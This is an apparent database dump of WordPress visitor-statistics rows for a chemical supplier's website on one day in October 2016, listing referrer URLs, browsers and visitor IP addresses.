INSERT INTO `wp_statistics_visitor` VALUES (3245, '2016-10-12', 'https://r.search.yahoo.com/_ylt=AwrBT.LKR_5XYewAg3RXNyoA;_ylu=X3oDMTByOHZyb21tBGNvbG8DYmYxBHBvcwMxBHZ0aWQDBHNlYwNzcg--/RV=2/RE=1476311115/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=1sD0U6jEy.lyhgqqBUcZZ_3WeLI-', 'MSIE', 'Windows', '11.0', '', '207.68.114.247', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3246, '2016-10-12', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '142.150.226.109', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3247, '2016-10-12', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwjWtYuWvNXPAhVD1CYKHUYXCFwQFgg3MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fvazo-radical-initiators%2F&usg=AFQjCNGqLnzWzrxM0sjJ8J8QHkCrKzs6fw', 'MSIE', 'Windows', '11.0', '', '192.28.0.15', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3248, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '175.197.148.112', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3249, '2016-10-12', 'https://www.bing.com/search?q=vazo%20initiators&qs=n&form=QBRE&pq=vazo%20initiators&sc=2-14&sp=-1&sk=&cvid=36268F32E5DE424FA344CE047524AE56', 'MSIE', 'Windows', '11.0', '', '216.99.122.66', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3250, '2016-10-12', 'https://www.google.com/', 'Safari', 'iPhone', '9.0', '', '70.196.64.99', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3251, '2016-10-12', 'https://www.google.co.kr/', 'Chrome', 'Windows', '53.0.2785.143', '', '119.197.187.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3252, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3253, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3254, '2016-10-12', 'https://www.google.fr/', 'Chrome', 'Windows', '53.0.2785.143', '', '90.61.105.53', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3255, '2016-10-12', 'https://www.bing.com/search?q=miller+stevenson&src=IE-SearchBox&FORM=IENTTR&conversationid=', 'MSIE', 'Windows', '11.0', '', '204.62.206.254', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3256, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', 'or', '', '203.133.168.11', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3257, '2016-10-12', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '173.161.65.17', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3258, '2016-10-12', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '207.118.123.95', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3259, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '134.129.104.157', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3260, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '128.8.86.144', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3261, '2016-10-12', 'https://www.google.se/', 'Chrome', 'Windows', '53.0.2785.143', '', '194.17.131.83', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3262, '2016-10-12', 'https://www.google.co.uk/', 'Chrome', 'Windows', '53.0.2785.143', '', '89.240.231.92', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3263, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '98.167.192.230', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3264, '2016-10-12', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '184.69.10.114', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3265, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '23.252.86.239', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3266, '2016-10-12', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '166.137.125.45', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3267, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '108.49.137.240', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3268, '2016-10-12', 'https://www.miller-stephenson.com/product/vazo-88/', 'MSIE', 'Windows', '11.0', '', '206.167.137.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3269, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '107.209.112.234', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3270, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '199.96.227.1', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3271, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.116', '', '12.199.138.2', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3272, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '202.65.158.54', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3273, '2016-10-12', 'https://www.miller-stephenson.com/krytox-ts4-thread-sealant/', 'MSIE', 'Windows', '8.0', '', '62.24.181.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3274, '2016-10-12', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '192.234.13.34', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3275, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '124.119.30.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3276, '2016-10-12', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwjH4remy9XPAhWBcyYKHS2oCfEQFggqMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fheloxy-61%2F&usg=AFQjCNHRhUCsvREbGx232y2vXbsIbEvlHA&sig2=_GIC2FmuJpBVr5WW8TPkPw', 'MSIE', 'Windows', '11.0', '', '204.136.186.158', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3277, '2016-10-12', 'https://www.directindustry.fr/prod/miller-stephenson-chemical-co/product-173822-1749967.html', 'Chrome', 'Windows', '53.0.2785.143', '', '172.28.72.145', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3278, '2016-10-12', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.16', '', '37.106.132.220', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3279, '2016-10-12', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '103.206.48.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3280, '2016-10-12', 'https://us.search.yahoo.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.203.199.216', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3281, '2016-10-12', 'https://www.miller-stephenson.com/krytox/', 'MSIE', 'Windows', '8.0', '', '62.24.181.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3282, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '132.3.45.80', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3283, '2016-10-12', 'https://www.miller-stephenson.com/notify-SubZero?aHR0cDovL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb20vcHJvZHVjdC9xdWlrLWZyZWV6ZS1hbnRpc3RhdGljLw==;+/qA92Ge4F6+KaGR3qy4pA8K/izpd0+cFncfws/Lmk4=', 'MSIE', 'Windows', '11.0', '', '132.3.45.81', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3284, '2016-10-12', 'https://www.miller-stephenson.com/notify-SubZero?aHR0cDovL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb20vcHJvZHVjdC9xdWlrLWZyZWV6ZS1hbnRpc3RhdGljLw==;+/qA92Ge4F6+KaGR3qy4pA8K/izpd0+cFncfws/Lmk4=', 'MSIE', 'Windows', '11.0', '', '132.3.45.78', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3285, '2016-10-12', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Firefox', 'Windows', '44.0', '', '199.168.97.28', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3286, '2016-10-12', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Firefox', 'Windows', '43.0', '', '199.168.97.28', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3287, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '132.3.45.79', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3288, '2016-10-12', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '71.180.165.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3289, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.38.27.152', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3290, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '22.0.1207.1', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3291, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '50.0.2661.102', '', '199.255.170.74', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3292, '2016-10-12', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjMva-L0dXPAhWBHB4KHXndAFkQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135475266,d.dmo', 'MSIE', 'Windows', '11.0', '', '200.38.16.53', '000', 40, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3293, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '27.211.37.156', '000', 49, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3294, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.31.242.67', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3295, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '201.156.184.225', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3296, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '192.65.41.109', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3297, '2016-10-12', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwiCu_LZ1NXPAhUH7oMKHYSCCUwQFghPMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-201%2F&usg=AFQjCNHfDdaNIoarPJA9xpDKKkrwVtIt7w', 'MSIE', 'Windows', '11.0', '', '199.243.212.87', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3298, '2016-10-12', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjjk4XH1tXPAhWHI4EKHYaUD5MYABAA&sig=AOD64_2dhfRwCaoRSQaL-PXJaMcIJAvOvw&rct=j&q=&ved=0ahUKEwiJkYLH1tXPAhVJOSYKHbuwCe0Q0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '98.102.3.170', '000', 27, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3299, '2016-10-12', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwiRj96I2NXPAhVh7IMKHbWRDwYQFggsMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepikure-w%2F&usg=AFQjCNHEXqhjk-N_pRnZi-f1vbzhvmYcwA&bvm=bv.135475266,d.amc', 'MSIE', 'Windows', '11.0', '', '12.229.217.218', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3300, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '174.127.22.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3301, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.144', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3302, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.192', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3303, '2016-10-12', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '24.118.230.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3304, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.5', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3305, '2016-10-12', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.4', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3306, '2016-10-12', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwjd-rbM3dXPAhUJWD4KHaELCLYQFggpMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-111-epoxy-stripping-agent%2F&usg=AFQjCNFQwRFTtPon2Qqwmei8CXX9dl913g&bvm=bv.135475266,d.cWw', 'MSIE', 'Windows', '11.0', '', '192.249.47.208', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3307, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '48.0.2564.82', '', '199.107.68.202', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3308, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.116', '', '74.136.77.88', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3309, '2016-10-12', 'https://www.photorepair.ru/', 'Opera', 'Windows', '9.01', '', '46.118.155.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3310, '2016-10-12', 'https://www.bing.com/search?q=283ad%20grease&qs=n&form=QBRE&pq=283ad%20grease&sc=0-11&sp=-1&sk=&cvid=412C3FBC1C384C2ABE6AF549F79784AA', 'MSIE', 'Windows', '11.0', '', '141.189.251.16', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3311, '2016-10-12', 'https://www.google.com.mx/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwjNkpvTodHPAhVBKyYKHXnFAqUQFghXMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q', 'MSIE', 'Windows', '11.0', '', '189.211.19.3', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3312, '2016-10-12', 'https://www.bing.com/search?q=MILLER+STEPHESEN&src=IE-SearchBox&FORM=IENTSR', 'MSIE', 'Windows', '11.0', '', '76.79.117.246', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3313, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '47.0.2526.106', '', '199.107.68.202', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3314, '2016-10-12', 'https://www.miller-stephenson.com/chemicals/epoxy-resin-systems/epikure-curing-agents/', 'MSIE', 'Windows', '11.0', '', '10.21.129.166', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3315, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Macintosh', '49.0.2623.112', '', '67.180.67.5', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3316, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3317, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '173.68.68.111', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3318, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.11.135.8', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3319, '2016-10-12', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.116', '', '76.70.23.4', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3320, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '37.0.2062.124', '', '107.21.154.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3321, '2016-10-12', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjO25i649XPAhXnhVQKHW_UDx8QFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Frelease-agents%2F&usg=AFQjCNHbwMDofHjUU2PB95SWZra5M3XNKA&sig2=inSIdCjb9bEvZmV7i6v_JQ', 'MSIE', 'Windows', '11.0', '', '130.76.96.157', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3322, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '141.189.251.1', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3323, '2016-10-12', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjLvY2l5NXPAhXLvo8KHQoNBSgQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135475266,d.c2I', 'MSIE', 'Windows', '11.0', '', '216.237.199.65', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3324, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '10.110.47.149', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3325, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '167.191.243.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3326, '2016-10-12', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '12.44.10.100', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3327, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.37.101.18', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3328, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.173.238.173', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3329, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '75.99.123.114', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3330, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.157.243.227', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3331, '2016-10-12', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwi63-3y6dXPAhWs6IMKHTl2ApIQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135475266,d.amc', 'MSIE', 'Windows', '7.0', '', '208.68.247.150', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3332, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.138.185.143', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3333, '2016-10-12', 'https://odessa.mistr-x.org/', 'Opera', 'Windows', '8.01', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3334, '2016-10-12', 'https://www.adsensecustomsearchads.com/afs/ads?q=black%20epoxy%20resin&adpage=1&ccfn=amazon_search_numbered_wide_underline&r=m&fexp=21404&client=amazon&channel=g-channel-92%2Bg-channel-137%2Bg-channel-330&hl=en&adtest=off&type=0&oe=UTF-8&ie=UTF-8&format=n5&ad=n5&nocache=3671476294745621&num=0&output=uds_ads_only&v=3&bsl=10&u_his=3&u_tz=-240&dt=1476294745622&u_w=1280&u_h=720&biw=-12245933&bih=-12245933&isw=1036&ish=1&psw=1036&psh=0&frm=2&uio=uv3-&jsv=91621&rurl=httpss%3A%2F%2Fd14qd3he45186l.cloudfront.net%2Fads-search32.html&referer=www.amazon.com&optref=httpss%3A%2F%2Fb8f4658d86419250beda1ec7141ddc4d2e8d4732330632151d28894a29bffab7%2Fe9276e7aae08f0297a0dcb44cefa5209bffcd239c3f8a19d3ef5d9a1ca1db11b', 'Edge', 'Windows', '14.14393', '', '73.161.80.220', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3335, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.96.225.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3336, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3337, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.189.251.16', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3338, '2016-10-12', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '65.95.129.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3339, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '184.53.32.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3340, '2016-10-12', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '184.53.32.33', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3341, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '28.0.1500.94', '', '166.216.157.107', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3342, '2016-10-12', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '74.136.189.179', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3343, '2016-10-12', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwiK7OKL8NXPAhXINSYKHVDKCcIQFggoMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-xp-2a4%2F&usg=AFQjCNEqWVV6hn4LcIhxOno8lgqLAN7kZg', 'MSIE', 'Windows', '11.0', '', '75.147.17.209', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3344, '2016-10-12', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.1.50', '', '132.204.76.143', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3345, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3346, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2483.10', '', '23.19.125.28', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3347, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '192.101.136.97', '000', 28, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3348, '2016-10-12', 'https://krasivoe-hd.net/', 'MSIE', 'Windows', '5.0', '', '46.118.155.22', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3349, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.203.142.38', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3350, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '12.251.123.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3351, '2016-10-12', 'https://www.google.cl/', 'Safari', 'iPhone', '10.0', '', '186.9.128.228', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3352, '2016-10-12', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '64.183.73.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3353, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.71.185.36', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3354, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '71.13.119.171', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3355, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '156.47.15.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3356, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.157', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3357, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '107.77.66.87', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3358, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.101.136.97', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3359, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '74.7.224.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3360, '2016-10-12', 'https://www.google.com/aclk?sa=L&ai=DChcSEwi4kfXQ9tXPAhVHX34KHeIpBBEYABAF&sig=AOD64_3sdBhEafHVUEB50DbGCFAmQdOORQ&rct=j&q=&ved=0ahUKEwj8q_LQ9tXPAhXkwFQKHe8iDcUQ0QwIJQ&adurl=', 'MSIE', 'Windows', '11.0', '', '70.181.0.79', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3361, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.220.25.190', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3362, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '54.234.100.38', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3363, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '23.228.141.40', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3364, '2016-10-12', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '130.76.24.20', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3365, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.85.239.187', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3366, '2016-10-12', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '125.209.235.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3367, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.116', '', '125.209.235.167', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3368, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '64.80.221.178', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3369, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.195', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3370, '2016-10-12', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '63.251.118.200', '000', 2, 0); 
